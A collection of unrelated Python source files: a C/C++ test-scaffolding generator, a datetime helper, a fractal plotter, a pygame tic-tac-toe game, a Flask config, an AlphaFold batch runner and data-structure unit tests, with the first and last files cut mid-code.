path_SrcFolder = Path(self.pkgDesc.str_srcfldr) / self.str_SRC_FOLDER_REL
path_HeaderFolder = Path(self.pkgDesc.str_srcfldr) / self.str_HEADER_FOLDER_REL
str_SrcFolder = str(path_SrcFolder)
str_HeaderFolder = str(path_HeaderFolder)
printout("Default folders:\n\tHeader: %s\n\tSource: %s" % (str_HeaderFolder, str_SrcFolder))
if not questionYesNo('Are folders correct?'):
self.str_HEADER_FOLDER_REL = questionReturnString('Define folder name for header. (inside \"%s\" folder):' % (self.pkgDesc.str_srcfldr))
self.str_SRC_FOLDER_REL = questionReturnString('Define folder name for source. (inside \"%s\" folder):' % (self.pkgDesc.str_srcfldr))
path_HeaderFolder = Path(self.pkgDesc.str_srcfldr) / self.str_HEADER_FOLDER_REL
path_SrcFolder = Path(self.pkgDesc.str_srcfldr) / self.str_SRC_FOLDER_REL
str_SrcFolder = str(path_SrcFolder)
str_HeaderFolder = str(path_HeaderFolder)
self.str_SRC_FOLDER = str_SrcFolder
self.str_HEADER_FOLDER = str_HeaderFolder
pass
def defineCoverageCfg(self):
'''
User can define coverage configuration.
'''
self.testConfig.co_coverage.isTurnedOn = questionYesNo('Do you want to enable coverage:', forced_default=True)
self.testConfig.co_coverage.uncoveredLineListLength = 0
pass
def defineStatAnalysisCfg(self):
'''
User can define static analysis configuration.
'''
self.testConfig.co_staticAnalysis.isTurnedOn = questionYesNo('Do you want to enable static analysis:', forced_default=True)
# configuration make sence only when static analysis is turned on. we can let it in default state.
if self.testConfig.co_staticAnalysis.isTurnedOn:
self.testConfig.co_staticAnalysis.isLanguageDefinedBySuffix = questionYesNo('Should be language recognized from suffix:', default_val=False, forced_default=True)
self.testConfig.co_staticAnalysis.str_c_version = questionWithList('Choose version of c.',['c89', 'c99', 'c11'],'c99')
self.testConfig.co_staticAnalysis.str_cpp_version = questionWithList('Choose version of c++.',['c++03', 'c++11', 'c++14', 'c++17', 'c++20'],'c++11')
self.testConfig.co_staticAnalysis.str_tool = 'cppcheck'
self.testConfig.co_staticAnalysis.str_ForcedLang = self.str_LANGUAGE
def defineToolchainCfg(self):
'''
User can define toolchain configuration.
But currently this choises will be disabled.
'''
self.testConfig.co_testToolchain.str_compiler = 'mingw'
self.testConfig.co_testToolchain.str_testlib = 'cpputest'
pass
def defineCodeStatisticsCfg(self):
'''
User can define complexity static configuration.
'''
self.testConfig.co_codeStatistics.isTurnedOn = questionYesNo('Do you want to enable code quality parameters:', forced_default=True)
if self.testConfig.co_codeStatistics.isTurnedOn:
self.testConfig.co_codeStatistics.isUsedTestSpecificOnly = questionYesNo('Do you want to use only test parameters? Global params will not be taken in account.', forced_default=True)
if not self.testConfig.co_codeStatistics.isUsedTestSpecificOnly:
self.testConfig.co_codeStatistics.isUsedStricter = questionYesNo('Do you want to use harder criteries(test vs. global):', forced_default=True)
self.testConfig.co_codeStatistics.int_mccabeComplex = questionReturningPositiveInteger('Define McCabe complexity',default_uint=8,forced_default=True)
self.testConfig.co_codeStatistics.int_fncLength = questionReturningPositiveInteger('Define function length',default_uint=50,forced_default=True)
self.testConfig.co_codeStatistics.int_paramCnt = questionReturningPositiveInteger('Define maximum function params',default_uint=4,forced_default=True)
def createHeaderFile(self):
'''
Function check kind of language, choose correct default template file.
Sed correct value from configuration.
'''
str_src = ''
path_src = Path('Tools') / 'defaults' / 'src_templates'
dict = {'%COMPONENT_NAME': self.str_COMPONENT_NAME
,'%FILENAME': self.str_HEADER_FILE.split('.')[0]
,'%DATE':datetime.now().strftime('%d.%m.%y %H:%M:%S')
,'%YEAR':datetime.now().strftime('%Y')
}
if 'c++' == self.str_LANGUAGE:
dict['%CLASSNAME'] = self.str_COMPONENT_NAME
path_src = path_src / 'class.hpp'
elif 'c' == self.str_LANGUAGE:
path_src = path_src / 'c_file.h'
else:
assertWithText(False, 'Invalid language type.')
str_src = str(path_src)
str_dst = str(Path(self.str_HEADER_FOLDER) / self.str_HEADER_FILE)
processFile(str_src,str_dst, dict)
pass
def createSourceFile(self):
'''
Copy and process source file.
'''
str_src = ''
path_src = Path('Tools') / 'defaults' / 'src_templates'
dict = {'%COMPONENT_NAME': self.str_COMPONENT_NAME
,'%FILENAME': self.str_SRC_FILE.split('.')[0]
,'%DATE':datetime.now().strftime('%d.%m.%y %H:%M:%S')
,'%YEAR':datetime.now().strftime('%Y')
,'%HEADER_FILENAME': self.str_HEADER_FILE
}
if 'c++' == self.str_LANGUAGE:
dict['%CLASSNAME'] = self.str_COMPONENT_NAME
path_src = path_src / 'class.cpp'
elif 'c' == self.str_LANGUAGE:
path_src = path_src / 'c_file.c'
else:
assertWithText(False, 'Invalid language type.')
str_src = str(path_src)
#print(self.str_SRC_FILE)
str_dst = str(Path(self.str_SRC_FOLDER) / self.str_SRC_FILE)
processFile(str_src,str_dst, dict)
def copyAndCreateTestFiles(self):
'''
Copy and process test.cpp and AllTests.cpp
'''
#0 check if exists _Tpkg/src folder, but if this is correctly called its not necessary
pTestFldr = Path(self.str_TPKG_FOLDER) / self.pkgDesc.str_srctestfldr
checkIfFolderExists(pTestFldr)
#1 copy AllTests.cpp
str_allTsts = 'AllTests.cpp'
str_allTestFileDst = str(pTestFldr / str_allTsts)
str_allTestFileSrc = str(Path('Tools') / 'defaults' / 'src_templates' / str_allTsts)
copyTxtFile(str_allTestFileSrc,str_allTestFileDst)
#2 process test file according language
str_src = ''
path_src = Path('Tools') / 'defaults' / 'src_templates'
dict = {'%COMPONENT_NAME': self.str_COMPONENT_NAME
,'%FILENAME': self.str_SRC_FILE.split('.')[0]
,'%DATE':datetime.now().strftime('%d.%m.%y %H:%M:%S')
,'%YEAR':datetime.now().strftime('%Y')
,'%HEADER_FILENAME': self.str_HEADER_FILE
}
if 'c++' == self.str_LANGUAGE:
dict['%CLASSNAME'] = self.str_COMPONENT_NAME
path_src = path_src / 'test.cpp'
elif 'c' == self.str_LANGUAGE:
dict['%TESTGROUPNAME'] = self.str_COMPONENT_NAME
path_src = path_src / 'c_test.cpp'
else:
assertWithText(False, 'Invalid language type.')
str_src = str(path_src)
str_dst = str(pTestFldr / 'test.cpp')
processFile(str_src,str_dst, dict)
def copyAndCreateMemLeakMacroFiles(self):
pDstFldr = Path(self.str_TPKG_FOLDER) / self.pkgDesc.str_srctestfldr
pSrcDefaultFldr = Path('Tools') / 'defaults' / 'src_templates'
checkIfFolderExists(pDstFldr)
str_memLeakDetectionNewMacFile = 'MemLeakDetectionNewMacros.h'
str_memLeakDetectionMalMacFile = 'MemLeakDetectionMallocMacros.h'
copyTxtFile(str(pSrcDefaultFldr / str_memLeakDetectionNewMacFile),str(pDstFldr / str_memLeakDetectionNewMacFile))
copyTxtFile(str(pSrcDefaultFldr / str_memLeakDetectionMalMacFile),str(pDstFldr / str_memLeakDetectionMalMacFile))
pass
def createTestInitFile(self):
pTestFldr = Path(self.str_TPKG_FOLDER)
checkIfFolderExists(pTestFldr)
dict = { '%SRC_FLDR%': self.str_SRC_FOLDER_REL
,'%SRC_FILENAME%': self.str_SRC_FILE
,'%HEADER_FLDR%': self.str_HEADER_FOLDER_REL
,'%HEADER_FILENAME%': self.str_HEADER_FILE
,'%COVERAGE_IS_USED%': boolToStr(self.testConfig.co_coverage.isTurnedOn)
,'%COVERAGE_UNCOVLISTLEN%': str(self.testConfig.co_coverage.uncoveredLineListLength)
,'%CHECKCODE_IS_USED%': boolToStr(self.testConfig.co_staticAnalysis.isTurnedOn)
,'%CHECKCODE_TOOL%': self.testConfig.co_staticAnalysis.str_tool
,'%CHECKCODE_FORCEDLANG%': self.testConfig.co_staticAnalysis.str_ForcedLang
,'%CHECKCODE_C_VERSION%': self.testConfig.co_staticAnalysis.str_c_version
,'%CHECKCODE_CPP_VERSION%': self.testConfig.co_staticAnalysis.str_cpp_version
,'%TOOLCHAIN%': self.testConfig.co_testToolchain.str_compiler
,'%FRAMEWORK%': self.testConfig.co_testToolchain.str_testlib
,'%STATISTICS_IS_USED%': boolToStr(self.testConfig.co_codeStatistics.isTurnedOn)
,'%STATISTICS_USE_SPECIFIC_ONLY%': boolToStr(self.testConfig.co_codeStatistics.isUsedTestSpecificOnly)
,'%STATISTICS_USE_STRICTER%': boolToStr(self.testConfig.co_codeStatistics.isUsedStricter)
,'%STATISTICS_MCCAVE_LEVEL%': str(self.testConfig.co_codeStatistics.int_mccabeComplex)
,'%STATISTICS_FNCLEN_LEVEL%': str(self.testConfig.co_codeStatistics.int_fncLength)
,'%STATISTICS_PARAM_CNT%': str(self.testConfig.co_codeStatistics.int_paramCnt)
}
str_src = str(Path('Tools') / 'defaults' / 'src_templates' / 'test.ini')
str_dst = str(pTestFldr / self.pkgDesc.str_testcfgfilename)
processFile(str_src,str_dst,dict)
pass
def createTestCMakefile(self):
dict = {'%TESTPACKAGENAME%': self.str_COMPONENT_NAME}
str_src = str(Path('Tools') / 'defaults' / 'src_templates' / 'CMakeLists.txt')
str_dst = str(Path(self.str_TPKG_FOLDER) / 'CMakeLists.txt')
processFile(str_src,str_dst,dict)
pass
|
python
|
from typing import Optional
from datetime import datetime
BETFAIR_DATE_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"
basestring = (str, bytes)
numeric_types = (int, float)
integer_types = (int,)
# will attempt to use C/Rust libraries if installed
try:
import orjson as json
except ImportError:
import json
try:
import ciso8601
def parse_datetime(datetime_string: str) -> Optional[datetime]:
try:
return ciso8601.parse_datetime_as_naive(datetime_string)
except ValueError:
return
except ImportError:
def parse_datetime(datetime_string: str) -> Optional[datetime]:
try:
return datetime.strptime(datetime_string, BETFAIR_DATE_FORMAT)
except ValueError:
return
|
python
|
from random import random
from matplotlib import pyplot as plt
import numpy as np
def discrete(a):
t = sum(a)*random()
subtotal = 0.0
for j in range(len(a)):
subtotal += a[j]
if subtotal > t:
return j
def tabler():
n, *m = map(int, input().split(' '))
return [[float(x) for x in input().split(' ')] for _ in range(n)] if m else [float(x) for x in input().split(' ')]
rep = 100000 or int(input())
ps, xs, ys = (tabler() for _ in range(3))
w, h = 1024, 1024
im = np.empty((w, h), np.uint8)
x = y = 0.0
for i in range(rep):
r = discrete(ps)
x0 = xs[r][0] * x + xs[r][1] * y + xs[r][2]
y0 = ys[r][0] * x + ys[r][1] * y + ys[r][2]
x, y = x0, y0
im.itemset((int(y * w), int(x * h)), 255)
plt.imshow(im, origin='')
plt.show()
|
python
|
import pygame as pg
import sys
import time
from pygame.locals import *
# Setting up few properties
XO = 'x'
winner = None
draw = None
width = 500
height = 450
white = (255, 255, 255)
line_color = (130, 0, 0)
board = [[None]*3, [None]*3, [None]*3]
pg.init()
fps = 30
CLOCK = pg.time.Clock()
screen = pg.display.set_mode((width, height + 100), 0, 32)
pg.display.set_caption("Tic Tac Turtle")
time.sleep(5)
# loading the images as python object
initiating_window = pg.image.load("resources/modified_cover.png")
x_img = pg.image.load("resources/X_modified.png")
y_img = pg.image.load("resources/o_modified.png")
rematch = pg.image.load("resources/rematch.jpg")
thanks = pg.image.load("resources/thanks.jpg")
arko = pg.image.load("resources/arko.jpg")
code_loop = pg.image.load("resources/code_loop.jpg")
the_as8_org = pg.image.load("resources/the_as8_org.jpg")
# resizing images
initiating_window = pg.transform.scale(initiating_window, (width, height + 100))
x_img = pg.transform.scale(x_img, (80, 80))
o_img = pg.transform.scale(y_img, (80, 80))
# Sounds and Music
x_sound = pg.mixer.Sound("resources/x.wav")
o_sound = pg.mixer.Sound("resources/o.wav")
m_sound = pg.mixer.Sound("resources/m.wav")
music = pg.mixer.music.load("resources/music.mp3")
pg.mixer.music.play(-1)
def screen_timer(screen,time,slide):
i = 0
while i < time+1:
CLOCK.tick(fps)
screen.blit(slide, (0,0))
for event in pg.event.get():
if event.type == pg.QUIT:
pg.quit()
i += 1
pg.display.update()
def game_initiating_window():
screen.blit(initiating_window, (0, 0))
pg.display.update()
time.sleep(3)
screen.fill(white)
# drawing vertical lines
pg.draw.line(screen, line_color, (width / 3, 0), (width / 3, height), 7)
pg.draw.line(screen, line_color, (width / 3 * 2, 0), (width / 3 * 2, height), 7)
# drawing horizontal lines
pg.draw.line(screen, line_color, (0, height / 3), (width, height / 3), 7)
pg.draw.line(screen, line_color, (0, height / 3 * 2), (width, height / 3 * 2), 7)
draw_status()
def draw_status():
global draw
if winner is None:
message = XO.upper() + "'s Turn"
else:
message = winner.upper() + " won !"
if draw:
message = "Game Draw !"
font = pg.font.SysFont("georgia", 40)
text = font.render(message, 1, (255, 255, 255))
screen.fill ((130, 0, 0), (0, 450, 500, 100))
text_rect = text.get_rect(center =(width / 2, 500))
screen.blit(text, text_rect)
pg.display.update()
def check_win():
global board, winner, draw
# checking for winning rows
for row in range(0, 3):
if((board[row][0] == board[row][1] == board[row][2]) and (board [row][0] is not None)):
winner = board[row][0]
m_sound.play()
time.sleep(0.5)
pg.draw.line(screen, (130, 0, 0), (0, (row + 1)*height / 3 -height / 6), (width, (row + 1)*height / 3 - height / 6 ), 5)
break
# checking for winning columns
for col in range(0, 3):
if((board[0][col] == board[1][col] == board[2][col]) and (board[0][col] is not None)):
winner = board[0][col]
m_sound.play()
time.sleep(0.5)
pg.draw.line(screen, (130, 0, 0), ((col + 1)* width / 3 - width / 6, 0), ((col + 1)* width / 3 - width / 6, height), 5)
break
# check for diagonal winners
if (board[0][0] == board[1][1] == board[2][2]) and (board[0][0] is not None):
# game won diagonally left to right
winner = board[0][0]
m_sound.play()
time.sleep(0.5)
pg.draw.line(screen, (130, 0, 0), (50, 50), (450, 400), 5)
if (board[0][2] == board[1][1] == board[2][0]) and (board[0][2] is not None):
# game won diagonally right to left
winner = board[0][2]
m_sound.play()
time.sleep(0.5)
pg.draw.line (screen, (130, 0, 0), (450, 50), (50, 400), 5)
if(all([all(row) for row in board]) and winner is None ):
draw = True
draw_status()
def drawXO(row, col):
global board, XO
if row == 1:
posx = 40
if row == 2:
posx = width / 3 + 25
if row == 3:
posx = width / 3 * 2 + 10
if col == 1:
posy = 47
if col == 2:
posy = height / 3 + 65
if col == 3:
posy = height / 3 * 2 + 80
board[row-1][col-1] = XO
if(XO == 'x'):
x_sound.play()
time.sleep(0.6)
screen.blit(x_img, (posy, posx))
XO = 'o'
else:
o_sound.play()
time.sleep(0.6)
screen.blit(o_img, (posy, posx))
XO = 'x'
pg.display.update()
def user_click():
x, y = pg.mouse.get_pos()
if(x<width / 3):
col = 1
elif (x<width / 3 * 2):
col = 2
elif(x<width):
col = 3
else:
col = None
if(y<height / 3):
row = 1
elif (y<height / 3 * 2):
row = 2
elif(y<height):
row = 3
else:
row = None
if(row and col and board[row-1][col-1] is None):
global XO
drawXO(row, col)
check_win()
def reset_game1():
time.sleep(3)
screen.blit(rematch, (0,0))
pg.display.update()
x, y = pg.mouse.get_pos()
if (x<255 and x > 170) and (y>275 and y<360):
reset_game2()
elif (x>265 and x<330) and (y>275 and y<360):
screen_timer(screen,150,thanks)
screen_timer(screen,200,arko)
screen_timer(screen,150,code_loop)
screen_timer(screen,200,the_as8_org)
screen_timer(screen,200,initiating_window)
pg.quit()
sys.exit()
def reset_game2():
global board, winner, XO, draw
XO = 'x'
draw = False
game_initiating_window()
winner = None
board = [[None]*3, [None]*3, [None]*3]
game_initiating_window()
while(True):
for event in pg.event.get():
if event.type == QUIT:
pg.quit()
sys.exit()
elif event.type is MOUSEBUTTONDOWN:
user_click()
if(winner or draw):
reset_game1()
pg.display.update()
CLOCK.tick(fps)
|
python
|
import os
from datetime import timedelta
DEBUG = True
SQLALCHEMY_TRACK_MODIFICATIONS = False
PROPAGATE_EXCEPTIONS = True
JWT_BLACK_LIST_ENABLED = True
UPLOADED_IMAGES_DEST = os.path.join("static", "images")
JWT_BLACK_LIST_TOKEN_CHECKS = ["access", "refresh"]
JWT_SECRET_KEY = os.environ["JWT_SECRET_KEY"]
JWT_ACCESS_TOKEN_EXPIRES = timedelta(hours=1)
SECRET_KEY = os.environ["APP_SECRET_KEY"]
uri = os.environ.get("DATABASE_URI") # or other relevant config var
if uri.startswith("postgres://"):
uri = uri.replace("postgres://", "postgresql://", 1)
SQLALCHEMY_DATABASE_URI = uri
|
python
|
import os
from tqdm import tqdm
import subprocess
def alphafold(path):
# run alphafold
print("Running for path {}...".format(path))
subprocess.run(['bash', '/opt/alphafold/run.sh', '-d /lambda_stor/data/hsyoo/AlphaFoldData',
'-o ~/mutate_msa/folding_results/',
'-f {}'.format(path), '-t 2020-05-01', '-p casp14',
'-m model_1, model_2,model_3,model_4,model_5 -a 0,1,3,4,5,6,7'])
if __name__ == "__main__":
files = os.listdir('mutations')
for f in tqdm(files):
alphafold('mutations/{}'.format(f))
|
python
|
# -*- coding: utf-8 -*-
import unittest
import random
from pygorithm.data_structures import (
stack,
queue,
linked_list,
tree,
graph,
heap,
trie,
quadtree,
)
from pygorithm.geometry import vector2, rect2
class TestStack(unittest.TestCase):
def test_stack(self):
myStack = stack.Stack() # create a stack with default stack size 10
myStack.push(2)
myStack.push(10)
myStack.push(12)
myStack.push(3)
self.assertEqual(myStack.pop(), 3)
self.assertEqual(myStack.peek(), 12)
self.assertFalse(myStack.is_empty())
nullStack = stack.Stack()
self.assertEqual(nullStack.pop(), -1)
self.assertEqual(nullStack.peek(), -1)
self.assertTrue(nullStack.is_empty())
class TestInfixToPostfix(unittest.TestCase):
def test_infix_to_postfix(self):
myExp = "a+b*(c^d-e)^(f+g*h)-i"
myExp = [i for i in myExp]
myStack = stack.Stack(len(myExp)) # create a stack
result = stack.InfixToPostfix(myExp, myStack)
resultString = result.infix_to_postfix()
expectedResult = "a b c d ^ e - f g h * + ^ * + i -"
self.assertTrue(resultString, expectedResult)
class TestKruskal(unittest.TestCase):
def test_minimum_spanning_tree(self):
"""
test inspired from the example at the following link: https://en.wikipedia.org/wiki/Kruskal%27s_algorithm
"""
edges_weighted = [
((1, 2), 7),
((2, 3), 8),
((1, 4), 5),
((2, 4), 9),
((2, 5), 7),
((3, 5), 5),
((4, 6), 6),
((5, 6), 8),
((5, 7), 9),
((6, 7), 11),
((4, 5), 15),
]
wgraph = graph.WeightedGraph()
for (u, v), weight in edges_weighted:
wgraph.add_edge(u, v, weight)
expected = [
((1, 4), 5),
((3, 5), 5),
((4, 6), 6),
((1, 2), 7),
((2, 5), 7),
((5, 7), 9),
]
self.assertEqual(wgraph.kruskal_mst(), expected)
def test_minimum_spanning_tree_2(self):
"""
Test inspired by the gif at the left of the page https://en.wikipedia.org/wiki/Kruskal%27s_algorithm
"""
edges_weighted = [
((1, 2), 3),
((1, 5), 1),
((2, 5), 4),
((2, 3), 5),
((3, 5), 6),
((3, 4), 2),
((4, 5), 7),
]
wgraph = graph.WeightedGraph()
for (u, v), weight in edges_weighted:
wgraph.add_edge(u, v, weight)
expected = [((1, 5), 1), ((3, 4), 2), ((1, 2), 3), ((2, 3), 5)]
self.assertEqual(wgraph.kruskal_mst(), expected)
class TestQueue(unittest.TestCase):
def test_queue(self):
myQueue = queue.Queue() # create a queue with default queue size 10
myQueue.enqueue(2)
myQueue.enqueue(10)
myQueue.enqueue(12)
myQueue.enqueue(3)
self.assertEqual(myQueue.dequeue(), 2)
self.assertEqual(myQueue.dequeue(), 10)
self.assertFalse(myQueue.is_empty())
self.assertEqual(myQueue.dequeue(), 12)
self.assertEqual(myQueue.dequeue(), 3)
self.assertTrue(myQueue.is_empty())
def test_deque(self):
myDeque = queue.Deque()
myDeque.insert_front(1) # 1
myDeque.insert_rear(2) # 2 1
myDeque.insert_front(3) # 2 1 3
myDeque.insert_rear(10) # 10 2 1 3
self.assertEqual(myDeque.delete_rear(), 10)
self.assertEqual(myDeque.delete_front(), 3)
class TestLinkedList(unittest.TestCase):
def test_singly_linked_list(self):
List = linked_list.SinglyLinkedList()
List.insert_at_start(3)
List.insert_at_start(5)
List.insert_at_start(2)
List.insert_at_start(1)
List.insert_at_start(4)
List.insert_at_end(6)
expectedResult = [4, 1, 2, 5, 3, 6]
self.assertEqual(List.get_data(), expectedResult)
def test_doubly_linked_list(self):
dll = linked_list.DoublyLinkedList()
dll.insert_at_start(1)
dll.insert_at_start(2)
dll.insert_at_end(3)
dll.insert_at_start(4)
expectedResult = [4, 2, 1, 3]
self.assertEqual(dll.get_data(), expectedResult)
dll.delete(2)
expectedResult = [4, 1, 3]
self.assertEqual(dll.get_data(), expectedResult)
def test_cicular_linked_list(self):
cll = linked_list.CircularLinkedList()
cll.insert(1)
cll.insert(2)
cll.insert(3)
expectedResult = [1, 2, 3]
self.assertEqual(cll.get_data(), expectedResult)
class TestBinaryTree(unittest.TestCase):
def test_binary_tree(self):
root = tree.Node(1)
root.set_left(tree.Node(2))
root.set_right(tree.Node(3))
root.left.set_left(tree.Node(4))
Tree = tree.BinaryTree()
inorderTraversal = Tree.inorder(root)
expectedResult = [4, 2, 1, 3]
self.assertEqual(inorderTraversal, expectedResult)
preorderTraversal = Tree.preorder(root)
expectedResult = [1, 2, 4, 3]
self.assertEqual(preorderTraversal, expectedResult)
postorderTraversal = Tree.postorder(root)
expectedResult = [4, 2, 3, 1]
self.assertEqual(postorderTraversal, expectedResult)
class TestBinarySearchTree(unittest.TestCase):
def test_binary_search_tree(self):
root = tree.BinarySearchTree()
root.insert(10)
root.insert(12)
root.insert(5)
root.insert(4)
root.insert(20)
root.insert(8)
root.insert(7)
root.insert(15)
root.insert(13)
inorder = root.inorder()
preorder = root.preorder()
postorder = root.postorder()
expectedResult = [4, 5, 7, 8, 10, 12, 13, 15, 20]
self.assertEqual(inorder, expectedResult)
expectedResult = [10, 5, 4, 8, 7, 12, 20, 15, 13]
self.assertEqual(preorder, expectedResult)
expectedResult = [4, 7, 8, 5, 13, 15, 20, 12, 10]
self.assertEqual(postorder, expectedResult)
self.assertTrue(root.find(8))
class TestGraph(unittest.TestCase):
def test_topological_sort(self):
myGraph = graph.TopologicalSort()
myGraph.add_edge(5, 2)
myGraph.add_edge(5, 0)
myGraph.add_edge(4, 0)
myGraph.add_edge(4, 1)
myGraph.add_edge(2, 3)
myGraph.add_edge(3, 1)
ans = myGraph.topological_sort()
expectedResult = [5, 4, 2, 3, 1, 0]
self.assertEqual(ans, expectedResult)
def test_cycle_in_directed_graph(self):
myGraph = graph.CheckCycleDirectedGraph()
myGraph.add_edge(0, 1)
myGraph.add_edge(0, 2)
myGraph.add_edge(1, 2)
myGraph.add_edge(2, 0)
myGraph.add_edge(2, 3)
myGraph.add_edge(3, 3)
self.assertTrue(myGraph.check_cycle())
def test_add_edge_in_undirected_graph(self):
myGraph = graph.CheckCycleUndirectedGraph()
myGraph.add_edge(0, 1)
myGraph.add_edge(0, 2)
setFrom0 = myGraph.graph[0]
setFrom1 = myGraph.graph[1]
setFrom2 = myGraph.graph[2]
self.assertIsNotNone(setFrom0)
self.assertIsNotNone(setFrom1)
self.assertIsNotNone(setFrom2)
self.assertIn(1, setFrom0)
self.assertIn(0, setFrom1)
self.assertIn(2, setFrom0)
self.assertIn(0, setFrom2)
def test_cycle_in_undirected_graph(self):
myGraph = graph.CheckCycleUndirectedGraph()
myGraph.add_edge(0, 1)
myGraph.add_edge(0, 2)
myGraph.add_edge(1, 2)
myGraph.add_edge(2, 0)
myGraph.add_edge(2, 3)
myGraph.add_edge(3, 3)
self.assertTrue(myGraph.check_cycle())
def test_creating_weighted_undirected_graph(self):
myGraph = graph.WeightedUndirectedGraph()
myGraph.add_edge(0, 1, 1)
self.assertIn(0, myGraph.graph[1])
self.assertIn(1, myGraph.graph[0])
self.assertEqual(1, myGraph.get_edge_weight(0, 1))
self.assertEqual(1, myGraph.get_edge_weight(1, 0))
myGraph.add_edge(0, 2, 3)
self.assertIn(0, myGraph.graph[2])
self.assertIn(0, myGraph.graph[1])
self.assertIn(1, myGraph.graph[0])
self.assertIn(2, myGraph.graph[0])
self.assertEqual(1, myGraph.get_edge_weight(0, 1))
self.assertEqual(1, myGraph.get_edge_weight(1, 0))
self.assertEqual(3, myGraph.get_edge_weight(0, 2))
self.assertEqual(3, myGraph.get_edge_weight(2, 0))
myGraph.add_edge(2, 3, 7)
self.assertIn(0, myGraph.graph[2])
self.assertIn(3, myGraph.graph[2])
self.assertIn(2, myGraph.graph[3])
self.assertNotIn(0, myGraph.graph[3])
self.assertNotIn(3, myGraph.graph[0])
self.assertEqual(7, myGraph.get_edge_weight(2, 3))
self.assertIsNone(myGraph.get_edge_weight(0, 3))
def test_removing_from_weighted_undirected_graph(self):
myGraph = graph.WeightedUndirectedGraph()
myGraph.add_edge(0, 1, 1)
myGraph.add_edge(0, 2, 1)
myGraph.add_edge(0, 3, 1)
myGraph.add_edge(0, 4, 1)
myGraph.add_edge(4, 5, 1)
myGraph.add_edge(2, 6, 1)
self.assertEqual(1, myGraph.get_edge_weight(0, 1))
self.assertEqual(1, myGraph.get_edge_weight(0, 2))
self.assertEqual(1, myGraph.get_edge_weight(0, 3))
self.assertEqual(1, myGraph.get_edge_weight(0, 4))
self.assertEqual(1, myGraph.get_edge_weight(4, 5))
self.assertEqual(1, myGraph.get_edge_weight(2, 6))
myGraph.remove_edge(0, 1)
self.assertIsNone(myGraph.get_edge_weight(0, 1))
self.assertEqual(1, myGraph.get_edge_weight(0, 2))
self.assertEqual(1, myGraph.get_edge_weight(0, 3))
self.assertEqual(1, myGraph.get_edge_weight(0, 4))
self.assertEqual(1, myGraph.get_edge_weight(4, 5))
self.assertEqual(1, myGraph.get_edge_weight(2, 6))
myGraph.remove_edge(0, 2)
self.assertIsNone(myGraph.get_edge_weight(0, 1))
self.assertIsNone(myGraph.get_edge_weight(0, 2))
self.assertEqual(1, myGraph.get_edge_weight(0, 3))
self.assertEqual(1, myGraph.get_edge_weight(0, 4))
self.assertEqual(1, myGraph.get_edge_weight(4, 5))
self.assertEqual(1, myGraph.get_edge_weight(2, 6))
myGraph.remove_edge(0)
self.assertIsNone(myGraph.get_edge_weight(0, 1))
self.assertIsNone(myGraph.get_edge_weight(0, 2))
self.assertIsNone(myGraph.get_edge_weight(0, 3))
self.assertIsNone(myGraph.get_edge_weight(0, 4))
self.assertEqual(1, myGraph.get_edge_weight(4, 5))
self.assertEqual(1, myGraph.get_edge_weight(2, 6))
def test_gridify_weighted_undirected_graph(self):
rt2 = 1.4142135623730951
myGraph = graph.WeightedUndirectedGraph()
myGraph.gridify(4, 1)
self.assertEqual(1, myGraph.get_edge_weight((0, 0), (0, 1)))
self.assertAlmostEqual(rt2, myGraph.get_edge_weight((0, 0), (1, 1)))
self.assertIsNone(myGraph.get_edge_weight((0, 0), (2, 0)))
self.assertEqual(1, myGraph.get_edge_weight((2, 3), (3, 3)))
self.assertIsNone(myGraph.get_edge_weight((3, 3), (3, 4)))
class TestHeap(unittest.TestCase):
def test_heap(self):
myHeap = heap.Heap()
myHeap.insert(6)
myHeap.insert(3)
myHeap.insert(5)
myHeap.insert(12)
myHeap.insert(1)
expectedResult = [1, 3, 5, 12, 6]
self.assertEqual(myHeap.queue, expectedResult)
self.assertEqual(myHeap.pop(), 1)
expectedResult = [3, 5, 12, 6]
self.assertEqual(myHeap.queue, expectedResult)
self.assertEqual(myHeap.pop(), 3)
expectedResult = [5, 12, 6]
self.assertEqual(myHeap.queue, expectedResult)
self.assertEqual(myHeap.pop(), 5)
expectedResult = [6, 12]
self.assertEqual(myHeap.queue, expectedResult)
self.assertEqual(myHeap.pop(), 6)
expectedResult = [12]
self.assertEqual(myHeap.queue, expectedResult)
self.assertEqual(myHeap.pop(), 12)
expectedResult = []
self.assertEqual(myHeap.queue, expectedResult)
class TestTrie(unittest.TestCase):
def test_stack(self):
myTrie = trie.Trie()
myTrie.insert("the")
myTrie.insert("turtle")
myTrie.insert("thesaurus")
myTrie.insert("chocolate")
myTrie.insert("flying")
self.assertEqual(myTrie.find_words("th"), ["the", "thesaurus"])
self.assertEqual(myTrie.find_words("e"), None)
self.assertEqual(myTrie.search("chocolate"), True)
self.assertEqual(myTrie.search("flying"), True)
self.assertEqual(myTrie.search("walking"), False)
class TestQuadTreeNode(unittest.TestCase):
def setUp(self):
self.rect1 = rect2.Rect2(1, 1, vector2.Vector2(2, 2))
def test_constructor(self):
ent = quadtree.QuadTreeEntity(self.rect1)
self.assertIsNotNone(ent.aabb)
self.assertEqual(1, ent.aabb.width)
self.assertEqual(1, ent.aabb.height)
self.assertEqual(2, ent.aabb.mincorner.x)
self.assertEqual(2, ent.aabb.mincorner.y)
def test_repr(self):
ent = quadtree.QuadTreeEntity(self.rect1)
exp = (
"quadtreeentity(aabb=rect2(width=1, height=1, mincorner=vector2(x=2, y=2)))"
)
self.assertEqual(exp, repr(ent))
def test_str(self):
ent = quadtree.QuadTreeEntity(self.rect1)
exp = "entity(at rect(1x1 at <2, 2>))"
self.assertEqual(exp, str(ent))
class TestQuadTree(unittest.TestCase):
def setUp(self):
self.big_rect = rect2.Rect2(1000, 1000)
self.big_rect_sub_1 = rect2.Rect2(500, 500)
self.big_rect_sub_2 = rect2.Rect2(500, 500, vector2.Vector2(500, 0))
self.big_rect_sub_3 = rect2.Rect2(500, 500, vector2.Vector2(500, 500))
self.big_rect_sub_4 = rect2.Rect2(500, 500, vector2.Vector2(0, 500))
random.seed()
def test_constructor(self):
_tree = quadtree.QuadTree(64, 5, self.big_rect)
self.assertEqual(64, _tree.bucket_size)
self.assertEqual(5, _tree.max_depth)
self.assertEqual(1000, _tree.location.width)
self.assertEqual(1000, _tree.location.height)
self.assertEqual(0, _tree.location.mincorner.x)
self.assertEqual(0, _tree.location.mincorner.y)
self.assertEqual(0, _tree.depth)
self.assertIsNotNone(_tree.entities)
self.assertEqual(0, len(_tree.entities))
self.assertIsNone(_tree.children)
def test_get_quadrant(self):
_tree = quadtree.QuadTree(64, 5, self.big_rect)
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(320, 175)))
